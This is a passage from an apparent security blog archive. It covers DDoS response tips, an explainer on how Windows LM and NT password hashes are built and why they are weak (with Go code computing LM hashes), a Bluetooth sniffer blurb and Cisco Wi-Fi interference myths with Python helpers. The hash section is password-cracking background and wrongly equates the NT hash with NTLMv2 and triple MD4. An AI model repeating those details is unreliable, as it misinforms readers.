Convert your conference room into a war room. Get everyone that has influence in the company in that room. This includes marketing, IT, the CEO, etc. It ensures everyone is on the same page, leaders can lead, and everyone can be in sync.

I typically fill the room with a constant flow of healthy snacks, coffee, and other beverages. If you don’t have anything like that handy, order pizza immediately or send someone shopping.

4. Get one of your guys to the colo ASAP

If you are offline due to a DDoS attack, chances are your IT staff cannot log in to the remotely hosted hardware in your datacenters. The easy solution is to physically get them there. They can console in to the hardware and actually see what is going wrong. It’s not fun, but it will result in a much faster resolution to the problem (make sure they have folding chairs, cash for the vending machines, and serial cables).

5. Find an old hub

Yes, I said hub. You know, those old things that cause collisions? If your company is like a lot of companies, it may be difficult, in the middle of an attack, to set up a traffic monitoring port on your main routers. Assuming you’re set up with Ethernet, you can at least bridge a hub in-line, connect a laptop to the hub, and sniff or analyze the traffic!

This is key because having eyes into the data stream really helps figure out how to filter it. Pulling random cables and shutting down random services is not the solution. Make an informed call because you were thoughtful enough to have a hub or SPAN/Mirror port pre-configured.

6. Understand the nature of the attack

There’s a reason you are the target for this attack. Obviously there are a lot of reasons for any given attack, yet understanding the attacker’s motivation is key to creating a better defense strategy.

In the field I have observed a very strange phenomenon: the people working at a victim company usually have a gut feeling about why they are being attacked. So far, their gut instinct has been correct.

Some people know they are being extorted and some people feel it’s a competitor trying to shut them down. Others have a customer that has pissed someone off, so the attacker takes down the whole company just to silence one customer. Shutting down the attacker’s target for a while may actually save the entire ship. Go with your gut on this, make a hypothesis and test it.

7. Document everything

Your business was just smacked around by some bad guys, but what proof do you have? If you don’t have any, then what do you think the law enforcement is going to do for you?

During the attack, lock down all your logs and assign someone within the company to be the custodian of the records. Save server logs, web logs, email logs, any packet capture, network graphs, reports – anything – including a timeline of events.

8. Call your ISP

Your ISP can help; however, they have a process to follow. That process usually requires a ticket to be escalated before you can get real help. If you call early in the attack and open a ticket, that can help you when you really need someone.

Your ISP also has hardware that may be capable of filtering or rate-limiting the attack. The more you know about the attack, and the better you can point them in the right direction, the more they can help you.

They may also suggest that you sign up for their DDoS protection system. Don’t do that right away; reserve that until you are out of all other options. If you do sign up, make sure there is a service level agreement. In the meantime, there are a number of free services you can request:

  • Null routing of the target IP address
  • Router ACLs of the top attacking source addresses
  • New IP addresses
  • Detailed traffic reports

If you can find the guru at the ISP that knows how to fix these problems, that might be time well spent.

9. Set up “We are down” web hosting services

If the attack is running longer than you had anticipated and you don’t have a solution in sight, you could get your site working at least enough to communicate to your customers.

There are web-hosting companies that, as part of what they do, provide DDoS service level agreements. For a small amount of money you could quickly sign up with several of these companies, upload a “Sorry we’re down, but contact us here” page, and flip your DNS to the cluster of hosted servers.

Your customers will have more confidence in your performance and the attackers may get bored because the attack has not completely shut everything down. If this plan doesn’t work, at least you have diverted some of the attack away from your network.

10. Learn from the event

The period after an attack can be a blur; everyone is exhausted and burnt out. Mostly, everyone just wants the day-to-day atmosphere to return to the status quo. Well, if you’ve been attacked and you did not learn and improve your strategy for dealing with future attacks, then you are not doing your job.

You should start a review the very day after, while everything is fresh, and make sure that everyone is prepared. Go over what worked, what did not work, and how to improve your system’s overall technology.

Spend the money to fix things properly. Don’t just duct-tape it.

How I Cracked your Windows Password (Part 1)

January 25th, 2010 | Network Security

Introduction

Passwords tend to be our main and sometimes only line of defense against intruders. Even if attackers do not have physical access to a machine, they can often access a server through the remote desktop protocol or authenticate to a service via an outward-facing web application.

The purpose of this article is to educate you on how Windows creates and stores password hashes, and how those hashes are cracked. After demonstrating how to crack Windows passwords I will provide some tips for ensuring you are not vulnerable to these types of attacks.

How Windows Stores Passwords

Windows-based computers utilize two methods for the hashing of user passwords, each with drastically different security implications. These are LAN Manager (LM) and NT LAN Manager version 2 (NTLMv2). A hash is the result of a cryptographic function that takes an arbitrarily sized string of data, performs a one-way mathematical function on it, and returns a fixed-size string.

LM Password Hashes

The LAN Manager hash was one of the first password hashing algorithms to be used by Windows operating systems, and the only version to be supported up until the advent of NTLMv2 used in Windows 2000, XP, Vista, and 7. These newer operating systems still support the use of LM hashes for backwards compatibility purposes. However, it is disabled by default for Windows Vista and Windows 7.

The LM hash of a password is computed using a six step process:

  1. The user’s password is converted to all uppercase letters.
  2. The password is padded with null characters until it is 14 characters long.
  3. The padded password is split into two 7-character halves.
  4. Each half is used to create a DES encryption key; a parity bit is inserted after every 7 bits to turn the 56-bit half into a 64-bit key.
  5. Each DES key is used to encrypt a preset ASCII string (KGS!@#$%), resulting in two 8-byte ciphertext values.
  6. The two 8-byte ciphertext values are concatenated to form a 16-byte value, which is the completed LM hash.

In practice, the password “PassWord123” would be converted as follows:

  1. PASSWORD123
  2. PASSWORD123000
  3. PASSWOR and D123000
  4. PASSWOR1 and D1230001
  5. E52CAC67419A9A22 and 664345140A852F61
  6. E52CAC67419A9A22664345140A852F61


Figure 1: A password transformed into an LM hash
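The six steps above, carried out in code: this is an added Go implementation (not code from the article) that uses only the standard library’s crypto/des and reproduces the well-known LM hash of “password”, E52CAC67419A9A224A3B108F3FA6CB6D, whose first half matches step 5 of Figure 1. It assumes ASCII passwords; the empty-half constant AAD3B435B51404EE it produces for short passwords is the tell-tale that lets a defender spot LM hashes of seven characters or fewer in a password dump.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"fmt"
	"math/bits"
	"strings"
)

// lmMagic is the fixed 8-byte plaintext that every LM half-key encrypts.
const lmMagic = "KGS!@#$%"

// expandDESKey turns 7 password bytes (56 bits) into an 8-byte DES key:
// each 7-bit group is shifted left one bit and the low bit is set so that
// every key byte has odd parity. DES itself discards the parity bits, so
// only the 56 password bits influence the ciphertext.
func expandDESKey(half [7]byte) [8]byte {
	var acc uint64
	for _, b := range half {
		acc = acc<<8 | uint64(b)
	}
	var key [8]byte
	for i := 0; i < 8; i++ {
		seven := byte(acc>>uint(49-7*i)) & 0x7F
		k := seven << 1
		if bits.OnesCount8(seven)%2 == 0 {
			k |= 1 // make the byte's parity odd
		}
		key[i] = k
	}
	return key
}

// lmHalf encrypts the constant with the key derived from one 7-byte half.
func lmHalf(half [7]byte) [8]byte {
	key := expandDESKey(half)
	block, err := des.NewCipher(key[:])
	if err != nil {
		panic(err) // cannot happen: the key is always 8 bytes
	}
	var out [8]byte
	block.Encrypt(out[:], []byte(lmMagic))
	return out
}

// LMHalves runs the article's six steps and returns the two 8-byte
// ciphertexts as upper-case hex, so the halves can be inspected separately.
// Passwords longer than 14 characters are truncated here for illustration;
// real Windows stores the all-empty LM hash for them instead.
func LMHalves(password string) (string, string) {
	upper := []byte(strings.ToUpper(password)) // step 1 (ASCII only)
	if len(upper) > 14 {
		upper = upper[:14]
	}
	var padded [14]byte // zero-initialised: the NUL padding of step 2
	copy(padded[:], upper)

	var left, right [7]byte // step 3
	copy(left[:], padded[:7])
	copy(right[:], padded[7:])

	l, r := lmHalf(left), lmHalf(right) // steps 4 and 5
	return strings.ToUpper(hex.EncodeToString(l[:])),
		strings.ToUpper(hex.EncodeToString(r[:]))
}

// LMHash concatenates the two halves (step 6).
func LMHash(password string) string {
	l, r := LMHalves(password)
	return l + r
}

// EmptyLMHalf is the ciphertext of seven NUL bytes. A stored LM hash whose
// second half equals it reveals a password of at most seven characters.
const EmptyLMHalf = "AAD3B435B51404EE"

// ShortPassword reports whether an LM hash (32 hex chars) betrays a
// password of seven characters or fewer.
func ShortPassword(lmHash string) bool {
	return len(lmHash) == 32 && strings.ToUpper(lmHash[16:]) == EmptyLMHalf
}

func main() {
	for _, pw := range []string{"PassWord123", "password", "abc", ""} {
		h := LMHash(pw)
		fmt.Printf("%-14q -> %s  short=%v\n", pw, h, ShortPassword(h))
	}
}
```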

LM-stored passwords have a few distinct disadvantages. The first of these is that the encryption is based on the Data Encryption Standard (DES). DES originated from a 1970s IBM project that was eventually modified by NIST, sponsored by the NSA, and released as an ANSI standard in 1981. DES was considered secure for many years but came under scrutiny in the nineties due to its small key size of only 56 bits. This came to a head in 1998 when the Electronic Frontier Foundation was able to crack DES in about 23 hours. Since then, DES has been considered insecure and has been replaced with Triple-DES and AES. In short, it is another encryption standard that has fallen victim to modern computing power and can be cracked in no time at all.

Perhaps the biggest weakness in the LM hash is in the creation of the DES keys. In this process, a user-supplied password is automatically converted to all uppercase, padded to fourteen characters (the maximum length for an LM-hashed password), and split into two seven-character halves. Consider that there are 95 to the power of 14 possible passwords made up of 14 printable ASCII characters; this decreases to 95 to the power of 7 possible passwords for each 7-character half, and then to 69 to the power of 7 possible passwords when only uppercase ASCII characters are allowed. Essentially, this makes varying character case and increasing password length nearly useless when the password is stored as an LM hash, which leaves LM passwords incredibly vulnerable to brute-force cracking attempts.

NTLMv2 Password Hashes

NT LAN Manager (NTLM) is the Microsoft authentication protocol that was created to be the successor of LM. Eventually enhanced, NTLMv2 was accepted as the new authentication method of choice and implemented with Windows NT 4.

The creation of an NTLMv2 hash (henceforth referred to as the NT hash) is actually a much simpler process in terms of what the operating system actually does, and relies on the MD4 hashing algorithm to create the hash based upon a series of mathematical calculations. The MD4 algorithm is used three times in order to produce the NT hash. In practice, the password “PassWord123” would be represented as an MD4 hash with “94354877D5B87105D7FEC0F3BF500B33”.


Figure 2: A password being transformed into an NTLMv2 hash

MD4 is considered to be significantly stronger than DES in this role because it allows for longer passwords, it distinguishes between uppercase and lowercase letters, and it does not split the password into smaller, easier-to-crack chunks.

Perhaps the biggest complaint with NTLMv2-created hashes is that Windows does not utilize a technique called salting. Salting is a technique in which a random value is generated and combined with the password before the hash is computed. This means that the same password could have two completely different hash values, which would be ideal.

With this being the case, it is possible for a user to generate what are called rainbow tables. Rainbow tables are not just coffee tables painted with bright colors; they are actually tables containing the hash value for every possible password up to a certain number of characters. Using a rainbow table, you can simply take the hash value you have extracted from the target computer and search for it. Once it is found in the table, you will have the password. As you can imagine, a rainbow table for even a small number of characters can grow to be very large, meaning that its generation, storage, and indexing can be quite a task.

Conclusion

In the first part of this article we have examined password hashes and the mechanisms Windows utilizes to create and store these values. We’ve also touched upon the weaknesses of each method and possible avenues that can be used to crack those passwords. In the follow-up to this article we will actually step through the process of extracting and cracking these hashes to demonstrate their weaknesses. Once demonstrated I will provide tips for providing additional layers of security and creating a properly strengthened password.

Frontline Protocol Analyzer Packet Sniffer 7.12.17.0

January 22nd, 2010 | Wireless Security Concern

Bluetooth security seems to be very good compared to the problems of 802.11. But most of Bluetooth security is based on the PIN you have to enter when pairing two devices, or on the link key that results from it. In addition, Bluetooth uses many more channels and hops frequently within the spectrum, which makes analyzing it a real pain. Sniffing raw communication without being paired has until now only been available to rich companies or individuals who could buy one of the over-priced Bluetooth sniffers. When I say high-priced, I am talking about US$10,000.

Frontline is one of the few Bluetooth Sniffer manufacturers and they sell their application together with a special Bluetooth sniffer ComProbe / dongle. Here are some marketing highlights from their FTS4BT product website:

Supports EDR (Enhanced Data Rate): FTS4BT is the only analyzer currently on the market to support Bluetooth v2.0 EDR.

Finger-sized Bluetooth ComProbe: Air sniffing hardware is incredibly portable and requires no power.

Synchronized air and HCI sniffing: FTS4BT provides multiple points of observation, speeding up debug time.

Real-time debugging: FTS4BT captures, decodes, filters and displays data, and detects protocol errors simultaneously, all live and in real-time.

Decodes all Bluetooth protocols and most profiles. Quick release of new profiles to keep pace with changing Bluetooth specifications.

Extract Audio into WAV files for playback and analysis.

Includes Framedecoder for rapid development and seamless integration of HCI Vendor Extensions and other custom protocol implementations.

This Frontline technology is how we meet Bluetooth challenges

Cisco Spectrum Expert 20 Myths of Wi-Fi Interference

January 13th, 2010 | Wireless Security Concern

The growing ubiquity of wireless devices, combined with the advent of mobility applications, requires businesses to be diligent in managing interference throughout their deployments. The many wireless technologies and commonplace electrical devices already in use, and those newly emerging, impede wireless performance.

RF interference can be a major inhibitor to wireless performance, creating security vulnerabilities and wireless network instability.

This paper exposes the top 20 most pervasive myths around wireless interference.

Myth #1: “The only interference problems are from other 802.11 networks.”

There are a tremendous number of 802.11 devices out there. It is true that other 802.11 networks can cause interference with your network. This type of interference is known as co-channel and adjacent-channel interference. But since other 802.11 devices follow the same protocol, they tend to work cooperatively; that is, two access points on the same channel will share the channel capacity.
In reality, the many other types of devices emitting in the unlicensed band dwarf the number of 802.11 devices. These devices include microwave ovens, cordless phones, Bluetooth devices, wireless video cameras, outdoor microwave links, wireless game controllers, Zigbee devices, fluorescent lights, WiMAX, and so on. Even bad electrical connections can cause broad RF spectrum emissions. These non-802.11 types of interference typically don’t work cooperatively with 802.11 devices, and can cause significant loss of throughput. In addition, they can cause secondary effects such as rate back-off, in which retransmissions caused by interference trick the 802.11 devices into thinking that they should use lower data rates than appropriate.
Summary: The unlicensed band is an experiment by the FCC in unregulated spectrum sharing. The experiment has been a great success so far, but there are significant challenges posed by RF interference that need to be given proper attention.
Myth #2: “My network seems to be working, so interference must not be a problem.”

The 802.11 protocol is designed to be somewhat resilient to interference. When an 802.11 device senses an interference burst occurring before it has started its own transmission, it will hold off transmission until the interference burst is finished. If the interference burst starts in the middle of an ongoing 802.11 transmission (and results in the packet not being received properly), the lack of an acknowledgement packet will cause the transmitter to resend the packet. In the end, the packets generally get through. The result of all these hold-offs and retransmissions, however, is that the throughput and capacity of your wireless network are significantly impacted.
For example, microwave ovens emit interference on a 50 percent duty cycle (as they cycle on and off with the 60-Hz AC power). This means that a microwave oven operating at the same frequency as one of your 802.11 access points can reduce the effective throughput and capacity of that access point by 50 percent. So, if your access point was designed to achieve 24 Mbps, it may now be reduced to 12 Mbps in the vicinity of the microwave when it operates. If your only application on the WLAN is convenience data networking (for example, Web surfing), this loss of throughput may not be immediately obvious. But as you add capacity- and latency-sensitive applications such as voice over Wi-Fi to your network, controlling the impact of interference will become a critical issue.
Summary: Interference is out there. It’s just a silent killer thus far.
Myth #3: “I did an RF sweep before deployment. So I found all the interference sources.”

One of the most troubling issues about interference is that it is often intermittent in nature. The interference may occur only at certain times of day (for example, when someone is operating a device such as a cordless headset) or on certain days of the week. So, unless an initial sweep is done for an extended time, it’s very easy to miss sources of interference. And even if the sweep was extensive (for example, taking measurements in each area for 24 hours), things change over time. It’s very easy for someone to introduce one of the many devices that operate in the unlicensed band into your environment. No amount of periodic sweeping can truly guarantee that you have an interference-free environment.
Summary: You can’t sweep away the interference problem. Microwave ovens, cordless phones, Bluetooth devices, wireless video cameras, outdoor microwave links, wireless game controllers, Zigbee devices, fluorescent lights, WiMAX devices, and even bad electrical connections: all these things can cause broad RF spectrum emissions. These non-802.11 types of interference typically don’t work cooperatively with 802.11 devices.
Myth #4: “My infrastructure equipment automatically detects interference.”

Some of the newer, switch-based WLAN infrastructure products provide a level of RF interference management. With their 802.11 chipsets, these solutions detect the presence of non-802.11 signals, and in response to detection they can change the 802.11 channel of the APs in the area of the interference. An issue with this approach is that it doesn’t solve many of the problems that are out there. Some interfering devices (for example, Bluetooth devices, cordless phones, 802.11FH devices, and jamming emissions) are broadband, so it’s not possible to change channels away from them: they are everywhere in the band. And even for devices that operate on a static frequency, it can be challenging to manage channel assignments in a large, cell-based network. In the end, it’s critical that you be able to analyze the source of interference, that is, identify what the device is and where it is located, in order to determine the best course of action to handle the interference. In many cases, this “best action” will be removing the device from the premises. In other cases, the response may be to move or shield the device so that it no longer impacts the network.
Summary: Simple, automated-response-to-interference products are helpful, but they aren’t a substitute for understanding of the underlying problem.
Myth #5: “I can overcome interference by having a high density of access points.”

The inexpensive nature of 802.11 access points makes it tempting to deploy them with very high density. For example, some networks are being deployed with an AP in every room. This type of deployment has the benefit of greatly increasing the capacity of the network by allowing “spatial reuse” of the spectrum. It seems intuitive that by having more APs spread around, it’s more likely that a client will be able to operate successfully even when interference is present.
Unfortunately, when you deploy a dense network of access points, it’s necessary to reduce the transmit signal power of each of the access points. If you don’t reduce the power, the access points generate interference to each other, a phenomenon known as co-channel interference. The reduction in the transmit power of the access point exactly offsets the potential benefit of interference immunity. So in the end, the interference immunity of a network with a dense deployment of access points is not significantly better than that of a less dense deployment.
Summary: It’s reasonable to over-design your network for capacity, but a high density of access points is no panacea for interference.
Myth #6: “I can analyze interference problems with my packet sniffer.”

802.11 packet sniffer products suffer from the same problem as WLAN infrastructure equipment: they can see only what the 802.11 chips tell them. They can tell you about secondary indicators of interference, such as increased retransmissions and lower data rates, but they can’t analyze interference problems, determine the cause of the interference, and help you find where the interfering device is located.
A second problem with the data from 802.11 chips is that power measurements are typically uncalibrated. This means that the data you receive from an 802.11 chip about the signal strength of an access point (or other device) can usually not be expressed reliably in absolute dBm units. As a result, it is very difficult to put meaning on the numbers that packet sniffer devices report.
Summary: You need the right tool for analyzing interference. In the end, it’s critical that you be able to analyze the source of interference in order to determine the best course of action to handle the interference. In many cases, the best action will be removing the device from the premises.
Myth #7: “I have a wireless policy that doesn’t allow interfering devices into the premises.”

Having a wireless policy is a good first step in tackling the interference problem. But no policy is effective without enforcement. One of the great attributes of unlicensed band wireless devices is that they are inexpensive and widely available. As a result, it’s very easy for employees to purchase these devices and bring them to work. In many cases, these employees are not even aware that a particular device may cause interference with your wireless network. And some devices like cordless headsets and microwave ovens may be a necessary part of your business, so they can’t be completely disallowed.
Summary: You have to expect that interfering devices will sneak onto your premises.
Myth #8: “There is no interference at 5 GHz.”

It is generally true that fewer devices currently operating at 5 GHz are causing interference as compared to 2.4-GHz devices. But this will change over time. Just as everyone moved from 900 MHz to 2.4 GHz to avoid interference, the “band jumping” effect will catch up with 5 GHz. Some devices that already exist at 5 GHz include cordless phones, radar, perimeter sensors, and digital satellite.
Summary: You can run, but you can’t hide.
Myth #9: “I’ll hire a consultant to solve any interference problems I run into.”

If you have been running a WLAN for some time, you will know that there are frequent instances where your network doesn’t operate perfectly. Without having your own visibility into interference, you are left to guess about whether or not interference is the problem. Lack of visibility is an issue for IT personnel, especially when the CEO is asking why he was having trouble yesterday connecting in the conference room. And beyond the issues of control, it’s expensive and time-consuming to bring in a consultant to debug these kinds of problems. A single visit and trip report can cost on the order of US $5000 to $10,000.
Summary: You can’t afford to rely on a third party to debug your network.
Myth #10: “I give up. RF is impossible to understand.”

Don’t despair. Tools are now available that make RF easier to understand, even for those who consider themselves wired network specialists, not wireless experts. For example, Cisco® Spectrum Expert Wi-Fi classifies the sources of your interference, so you don’t need to read the “wiggly lines.” And after we’ve identified the interference, we help you find and eliminate it.
Summary: The cavalry is here!
Myth #11: “Wi-Fi interference doesn’t happen very often.”

There is a growing body of evidence that points to the fact that Wi-Fi interference is an extremely common and troublesome issue. Here are a few recent examples:
• The technical support engineers at a major Wi-Fi infrastructure vendor reported to Cisco that in a recent service call to a major customer they found almost 20 sources of interference, contributing to over 50 percent of the problems on the customer’s Wi-Fi network.

• The manager of a large group of outsourced wireless service representatives stated to Cisco that “one out of every three Wi-Fi problems our service technicians get called out for is related to interference.”

• In a recent survey of 300 of their customers, a major Wi-Fi tools provider reported that “troubleshooting interference won `top honors’ as the biggest challenge in managing a Wi-Fi network.”

• Jupiter Research reports 67 percent of all residential Wi-Fi problems are linked to interfering devices, such as cordless phones, baby monitors, and microwave ovens.

Summary: There’s no point burying your head in the sand: Wi-Fi interference happens.
Myth #12: “I should look for interference only after ruling out other problem sources.”

In any networking system, it’s critical that the physical layer is solid. When the physical layer is not operating properly, the higher protocol layers tend to operate in inefficient and sometimes confusing ways. For this reason, it always makes sense to verify your physical layer first before going on a wild-goose chase looking for higher-layer problems.
As an analogy, when you hook your computer up to an Ethernet cable and the network does not appear to be working, your first diagnostic step is to look at the lights on the side of your Ethernet adapter. If the lights are not on, there is no point looking for a subtle network configuration problem: you simply don’t have physical layer connectivity.
The potential for physical layer problems with Wi-Fi is much worse than with Ethernet. With an Ethernet cable, you worry about the physical-layer connectivity issue only the first time you plug in the cable. If the connection was working that first day, it’s reasonable to expect it will keep working day after day. But in the RF world, the quality of the physical connection can change hour by hour, as people introduce other devices or obstructions into the environment.
Summary: Avoid wasting your time. Fix your RF physical layer first.
Myth #13: “There’s nothing I can do about interference if I find it.”

The most common cure for interference is simply to replace or remove the offending interference device. For instance, you might replace an old leaky microwave oven or a 2.4-GHz cordless headset used by the receptionist with a different model that operates in a non-Wi-Fi frequency band. Many times interference is caused unwittingly by well-intentioned employees. One Wi-Fi administrator found an employee who sat with his back to his door, and had brought in a wireless camera so he could see behind him. Unfortunately, it operated at 2.4GHz. In this case, a policy was created to ban these types of devices on the campus.
Another solution is to work around the interference device by moving the affected access point, or changing its operating channel to a frequency that is not impacted by the interfering device. This is simple once you understand the location and frequency parameters of the interfering device. Note that because some devices frequency-hop (for example, Bluetooth devices) it’s not always possible to change channels and eliminate the interference.
A final cure is to move or shield the offending device. For example, in a hospital, a piece of equipment that causes RF interference might be isolated to a particular room where Wi-Fi network access is not critical. If that’s not possible, adding electromagnetic interference (EMI) shielding can limit propagation of the interference to a small area. You can implement shielding with grounded mesh or foils in the walls (essentially Faraday cages) or with insulating foams or paints.
Summary: There’s always a cure for interference, but you need to know what’s ailing you.
Myth #14: “There are just a few easy-to-find devices that can interfere with my Wi-Fi.”

With the huge proliferation of wireless devices in the unlicensed band, it is no longer obvious what might be a source of interference: wireless links are now embedded in watches, shoes, MP3 players, and many other tiny consumer devices.
In some cases, previously benign devices have been updated with RF technology. Motion detectors, which appear in many offices for lighting control, are a good example. A new breed of hybrid motion detectors uses a combination of passive infrared sensor (PIR) and 2.4-GHz radar to detect motion. These devices, which look identical to their benign predecessors, generate significant interference that can disrupt your Wi-Fi network.
Unintentional emitters are also hard to find. A defective ballast on a fluorescent light fixture can generate broadband RF interference that can impact Wi-Fi. This is impossible to identify by simply looking at the device. “Hidden devices” are becoming more common as well. We have seen numerous instances where a security group has hidden wireless cameras, unbeknownst to the networking group, not realizing that they are jamming the Wi-Fi network.
Summary: You need the right tool to find interference fast, and it’s not a magnifying glass.
Myth #15: “When interference occurs, the impact on data is typically minor.”

The impact of a single interferer on data throughput (or data capacity) of your Wi-Fi network can be astounding.
There are three major factors that determine the impact of an interference device:
• Output power. The greater the output power, the larger the physical “zone of interference” the device creates.

• Signal behavior with respect to time. Analog devices, such as some video cameras and older cordless phones, have a constant always-on signal. Digital devices, such as digital cordless phones, tend to “burst” on and off. Different devices have varying durations of on-time and off-time. In general, the greater the percentage of time that the signal is “on” and the more frequently it bursts, the greater the impact it will have on throughput.

• Signal behavior with respect to frequency. Some devices operate on a single frequency, and impact specific Wi-Fi channels. Other devices hop from frequency to frequency and impact every channel but to a lesser degree. Some devices, such as microwave ovens and jammers, sweep quickly across the frequency spectrum, causing brief but serious interruptions on many frequencies.

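To make the channel-change remedy concrete (a fixed-frequency device hits a few channels, a hopper touches all of them), here is an added Python example that is not part of the Cisco paper: it maps a device's frequency range, as read off a spectrum analyzer, onto the 2.4 GHz Wi-Fi channels it overlaps. The channel centre frequencies are the IEEE 802.11 values; the 22 MHz channel width and the two device footprints are assumptions.

```python
"""Which 2.4 GHz Wi-Fi channels does a non-Wi-Fi device hit?

Added example, not from the paper. Channel centre frequencies are the
IEEE 802.11 values (2412 MHz for channel 1, 5 MHz steps, 2484 MHz for
channel 14); the 22 MHz channel width is the 802.11b DSSS figure and is
assumed here for every channel.
"""
from dataclasses import dataclass

CHANNEL_WIDTH_MHZ = 22.0

def channel_center_mhz(channel: int) -> float:
    """Centre frequency of 2.4 GHz channel 1..14."""
    if channel == 14:
        return 2484.0
    if 1 <= channel <= 13:
        return 2412.0 + 5.0 * (channel - 1)
    raise ValueError(f"no such 2.4 GHz channel: {channel}")

@dataclass
class Interferer:
    """Frequency range a device occupies, as read off a spectrum analyzer.
    For a hopping or sweeping device this is the whole range it visits."""
    name: str
    low_mhz: float
    high_mhz: float

def affected_channels(dev: Interferer) -> list:
    """Channels whose 22 MHz footprint overlaps the device's range."""
    hit = []
    for ch in range(1, 14):
        c = channel_center_mhz(ch)
        lo, hi = c - CHANNEL_WIDTH_MHZ / 2, c + CHANNEL_WIDTH_MHZ / 2
        if lo < dev.high_mhz and hi > dev.low_mhz:  # intervals overlap
            hit.append(ch)
    return hit

def escape_channels(dev: Interferer, candidates=(1, 6, 11)) -> list:
    """Non-overlapping channels the AP could move to; an empty list means a
    channel change cannot cure this device (the frequency-hopper case)."""
    bad = set(affected_channels(dev))
    return [ch for ch in candidates if ch not in bad]

# Constructed sample footprints, not measurements from the paper.
ANALOG_CAMERA = Interferer("analog video camera", 2450.0, 2470.0)
FH_PHONE = Interferer("frequency-hopping cordless phone", 2400.0, 2483.5)
```

Running `escape_channels(ANALOG_CAMERA)` shows the AP can move to channel 1 or 6, while `escape_channels(FH_PHONE)` is empty, which is the case where moving or shielding the device is the only remedy.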
A recent study undertaken by Farpoint Research measured the impact of various interference devices on the data throughput of Wi-Fi. At 25 feet from the AP or client, a microwave oven was found to degrade data throughput by 64 percent, a frequency-hopping phone degraded throughput by 19 percent, and an analog phone and video camera both degraded throughput by 100 percent (in other words, no ability to connect).
Summary: Interference can really take the zip out of your Wi-Fi data throughput.
Myth #16: “Voice data rates are low, so the impact of interference on voice over Wi-Fi should be minimal.”

With modern voice coding, the data rate of an individual voice call is on the order of 8 Kbps. Compared to the maximum throughput of a Wi-Fi network, this seems like a trivial amount, and it therefore seems reasonable to expect that a Wi-Fi access point can handle many concurrent voice-over-IP (VoIP) calls.
Unfortunately, many factors reduce the number of calls that an access point can handle. First, there is significant VoIP protocol-level overhead, which increases the typical stream to 100 Kbps. Then there is additional protocol overhead imposed by Wi-Fi. Second, voice traffic is very sensitive to jitter and delay, requiring extra capacity in the network to minimize congestion. The typical number of voice calls that vendors advertise they can handle with a Wi-Fi access point is only 15. When interference is introduced, the number of calls that can be handled drops from there.
In addition, small amounts of interference seriously impact voice-over-Wi-Fi voice quality. A recent study undertaken by Farpoint Research measured the impact of various interference devices on the mean opinion score (MOS) for voice-over-Wi-Fi calls, and found the voice quality falling to unacceptable levels when a microwave, cordless phone, video camera, or co-channel Wi-Fi device was within 25 feet of the access point or phone. And perhaps more importantly, interference creates coverage holes where phone calls will be dropped. An in-house study showed that the effective range of a VoWi-Fi phone drops by 50 percent with an interference device (cordless phone or video camera) at a distance of 75 feet from the access point. This 50 percent reduction in the range of your phones would likely result in coverage holes over 75 percent of your floor space.
Summary: Can you hear me now? Voice over Wi-Fi and interference don’t mix.
Myth #17: “Interference is a performance problem, but not a security risk.”

If an Internet worm got through your corporate firewall and was using up 50 percent of your corporate network bandwidth as it spread from machine to machine, would you consider that a security or a performance concern? The point here is that anything that impacts mission-critical corporate IT systems is a security concern. As your corporate Wi-Fi network becomes more and more mission-critical, any possible interference device, whether the interference is malicious, as in the case of a jammer, or accidental, must be viewed as a potential security issue. In addition to RF denial of service, there are several other risks related to non-Wi-Fi RF devices, including:
• Multiprotocol devices. Wi-Fi networks are typically locked down with secure access controls, but devices that run on non-Wi-Fi networks, such as Bluetooth devices, are not. A notebook computer with Wi-Fi and Bluetooth connectivity may act as a bridge, allowing an intruding device onto the corporate LAN or WLAN. Preventing accidental bridging between insecure networks and the corporate networks requires: 1) client-based tools that control configuration of wireless network interfaces, and 2) RF monitoring that watches for suspicious non-Wi-Fi activity indicating possible bridging.

• Non-Wi-Fi rogues. Most enterprises implement some form of Wi-Fi rogue access point detection to find unauthorized (and frequently unsecured) access points on the corporate network. But there are non-Wi-Fi devices (such as Bluetooth access points) that can open up a similar security hole. Like Wi-Fi rogues, these devices must be detected and eliminated.

• Leakage of sensitive data. Certain non-Wi-Fi devices such as cameras and cordless phones can be used to carry sensitive data out of a restricted area, bypassing corporate security policies. When this is a concern, a zone of restricted wireless operation should be established, and that zone should be enforced through monitoring of the spectrum for unauthorized devices.

Summary: RF security doesn’t stop with Wi-Fi. Do you know who is using your spectrum?
Myth #18: “802.11n and antenna systems will work around any interference issues.”

Systems that use multiple antennas or smart antennas are able to increase immunity to interference by boosting the desired signal seen at a receiver. When the desired signal is stronger, the ratio of that signal to interference (referred to as signal-to-noise ratio or SNR) is also improved. Effectively, this reduces the zone of interference associated with a particular interference device to a smaller area. But the gain achieved by a smart antenna system is typically only on the order of 10 dB of enhanced signal power. This means that the range of interference might be shrunk by a factor of 2 over a traditional antenna system, but even then the interference problem is far from solved. For example, if a device would have previously caused problems at a distance of 80 feet from the receiver, it will still cause problems up to 40 feet from the receiver. Thus you would have 5000 square feet of floor space where the interference is still a problem!
Summary: Antennas are a pain reliever, but far from a cure.
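The 10 dB, factor-of-two, 5000 square feet chain in the myth above is easy to check with a log-distance path-loss model; this added Python example is not from the paper. The path-loss exponent n is an assumption: the paper's factor of 2 corresponds to n of about 3.3, a typical cluttered-indoor value, while free-space propagation (n = 2) would shrink the radius by more.

```python
"""Interference zone shrink from antenna gain (added example, not the paper's).

Log-distance path-loss model: received power drops 10*n*log10(d) dB with
distance d, where the path-loss exponent n is an ASSUMPTION (2 = free space,
roughly 3 to 4 indoors). A gain of G dB on the desired signal lets the
interferer come closer before the link fails: 10*n*log10(r0 / r1) = G.
"""
import math

def radius_after_gain_ft(radius_ft: float, gain_db: float, n: float) -> float:
    """Radius r1 of the interference zone after a gain_db improvement,
    starting from radius r0 = radius_ft, under path-loss exponent n."""
    return radius_ft / 10 ** (gain_db / (10.0 * n))

def zone_area_sqft(radius_ft: float) -> float:
    """Floor area of a circular zone of interference around the device."""
    return math.pi * radius_ft ** 2

def zone_comparison(radius_ft: float = 80.0, gain_db: float = 10.0,
                    n: float = 3.32) -> dict:
    """Before/after figures for the paper's 80-foot example. n=3.32 is the
    exponent at which 10 dB halves the radius, matching the text."""
    r1 = radius_after_gain_ft(radius_ft, gain_db, n)
    return {
        "before_ft": radius_ft,
        "after_ft": r1,
        "shrink_factor": radius_ft / r1,
        "before_sqft": zone_area_sqft(radius_ft),
        "after_sqft": zone_area_sqft(r1),
    }

if __name__ == "__main__":
    for n in (2.0, 3.32):
        res = zone_comparison(n=n)
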